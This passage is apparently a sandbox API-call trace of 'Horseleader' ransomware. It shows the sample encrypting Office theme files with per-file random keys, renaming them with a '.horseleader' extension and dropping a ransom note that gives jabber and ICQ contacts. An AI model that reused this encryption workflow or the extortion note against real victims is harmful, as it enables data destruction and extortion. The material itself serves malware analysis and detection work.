dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, 
hTemplateFile=0x0) returned 0x1a4 [0247.187] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\INDUST.ELM") returned 77 [0247.187] StrStrW (lpFirst="INDUST.ELM", lpSrch=".txt") returned 0x0 [0247.187] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=99561) returned 1 [0247.187] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.187] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.190] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.190] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.190] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x9a74, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.191] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.191] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.191] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.191] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x134e9, 
lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.191] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.192] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.192] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.192] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.192] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.192] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.192] CloseHandle (hObject=0x1a4) returned 1 [0247.192] GetProcessHeap () returned 0x780000 [0247.192] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0247.192] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\INDUST.ELM.horseleader") returned 89 [0247.193] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\INDUST.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\indust\\indust.elm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common 
Files\\Microsoft Shared\\THEMES14\\INDUST\\INDUST.ELM.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\indust\\indust.elm.horseleader")) returned 1 [0247.193] GetProcessHeap () returned 0x780000 [0247.193] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0247.193] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x61cf3090, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x225, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="INDUST.INF", cAlternateFileName="")) returned 1 [0247.193] lstrcmpiW (lpString1="INDUST.INF", lpString2="Windows") returned -1 [0247.193] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\INDUST.INF") returned 77 [0247.194] StrStrIW (lpFirst="INDUST.INF", lpSrch=".horseleader") returned 0x0 [0247.194] lstrcmpW (lpString1="INDUST.INF", lpString2="#Decrypt#.txt") returned 1 [0247.194] lstrcmpW (lpString1="INDUST.INF", lpString2="_uninstalling_.png") returned 1 [0247.194] lstrlenW (lpString=".testttjffg") returned 11 [0247.194] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\INDUST.INF", lpSrch=".testttjffg") returned 0x0 [0247.194] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.194] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.194] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common 
Files\\Microsoft Shared\\THEMES14\\INDUST\\INDUST.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\indust\\indust.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.195] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\INDUST.INF") returned 77 [0247.195] StrStrW (lpFirst="INDUST.INF", lpSrch=".txt") returned 0x0 [0247.195] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=549) returned 1 [0247.195] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x225, lpOverlapped=0x0) returned 1 [0247.197] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffffddb, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.197] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x225, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x225, lpOverlapped=0x0) returned 1 [0247.197] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.197] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.197] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.197] CloseHandle (hObject=0x1a4) returned 1 [0247.197] GetProcessHeap () returned 0x780000 [0247.197] RtlAllocateHeap 
(HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0247.197] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\INDUST.INF.horseleader") returned 89 [0247.197] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\INDUST.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\indust\\indust.inf"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\INDUST.INF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\indust\\indust.inf.horseleader")) returned 1 [0247.201] GetProcessHeap () returned 0x780000 [0247.201] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0247.201] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5a6f8e30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x143b, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="PREVIEW.GIF", cAlternateFileName="")) returned 1 [0247.201] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="Windows") returned -1 [0247.201] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\PREVIEW.GIF") returned 78 [0247.201] StrStrIW (lpFirst="PREVIEW.GIF", lpSrch=".horseleader") returned 0x0 [0247.201] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="#Decrypt#.txt") returned 1 [0247.201] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="_uninstalling_.png") returned 1 [0247.201] lstrlenW (lpString=".testttjffg") returned 11 
[0247.201] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\PREVIEW.GIF", lpSrch=".testttjffg") returned 0x0 [0247.201] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.201] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.201] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\indust\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.202] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\PREVIEW.GIF") returned 78 [0247.202] StrStrW (lpFirst="PREVIEW.GIF", lpSrch=".txt") returned 0x0 [0247.202] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=5179) returned 1 [0247.202] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x143b, lpOverlapped=0x0) returned 1 [0247.204] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffebc5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.204] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x143b, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x143b, lpOverlapped=0x0) returned 1 [0247.204] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.204] WriteFile (in: hFile=0x1a4, 
lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.205] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.205] CloseHandle (hObject=0x1a4) returned 1 [0247.205] GetProcessHeap () returned 0x780000 [0247.205] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0247.205] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\PREVIEW.GIF.horseleader") returned 90 [0247.205] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\indust\\preview.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\PREVIEW.GIF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\indust\\preview.gif.horseleader")) returned 1 [0247.206] GetProcessHeap () returned 0x780000 [0247.206] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0247.206] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x6d489150, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x8317, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 1 [0247.206] lstrcmpiW 
(lpString1="THMBNAIL.PNG", lpString2="Windows") returned -1 [0247.206] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\THMBNAIL.PNG") returned 79 [0247.206] StrStrIW (lpFirst="THMBNAIL.PNG", lpSrch=".horseleader") returned 0x0 [0247.206] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="#Decrypt#.txt") returned 1 [0247.206] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="_uninstalling_.png") returned 1 [0247.206] lstrlenW (lpString=".testttjffg") returned 11 [0247.206] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\THMBNAIL.PNG", lpSrch=".testttjffg") returned 0x0 [0247.206] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.206] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.206] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\indust\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.207] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\THMBNAIL.PNG") returned 79 [0247.207] StrStrW (lpFirst="THMBNAIL.PNG", lpSrch=".txt") returned 0x0 [0247.207] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=33559) returned 1 [0247.207] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.209] 
SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.210] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.210] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x3317, lpOverlapped=0x0) returned 1 [0247.211] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffcce9, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.211] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x3317, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x3317, lpOverlapped=0x0) returned 1 [0247.211] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.211] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.211] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.211] CloseHandle (hObject=0x1a4) returned 1 [0247.212] GetProcessHeap () returned 0x780000 [0247.212] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0247.212] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft 
Shared\\THEMES14\\INDUST\\THMBNAIL.PNG.horseleader") returned 91 [0247.212] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\indust\\thmbnail.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\THMBNAIL.PNG.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\indust\\thmbnail.png.horseleader")) returned 1 [0247.213] GetProcessHeap () returned 0x780000 [0247.213] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0247.213] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x6d489150, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x8317, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 0 [0247.213] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0247.213] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\#Decrypt#.txt") returned 80 [0247.213] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\indust\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0247.214] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us 
via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0247.214] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0247.215] lstrlenA (lpString="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") returned 1368 [0247.215] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0247.215] CloseHandle (hObject=0x158) returned 1 [0247.216] GetProcessHeap () returned 0x780000 [0247.216] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0247.217] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a6f8e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x65d5e3f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x65d5e3f0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="IRIS", cAlternateFileName="")) returned 1 [0247.217] lstrcmpiW (lpString1="IRIS", lpString2="Windows") returned -1 [0247.217] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS") returned 64 [0247.217] lstrcmpW (lpString1="IRIS", lpString2=".") returned 1 [0247.217] lstrcmpW (lpString1="IRIS", lpString2="..") returned 1 [0247.217] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0247.217] GetProcessHeap () returned 0x780000 [0247.217] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, 
Size=0x840) returned 0x7e2960 [0247.217] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\*") returned 66 [0247.217] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a6f8e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x65d5e3f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x65d5e3f0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0247.218] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0247.218] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\.") returned 66 [0247.218] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0247.218] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a6f8e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x65d5e3f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x65d5e3f0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="..", cAlternateFileName="")) returned 1 [0247.218] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0247.218] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: 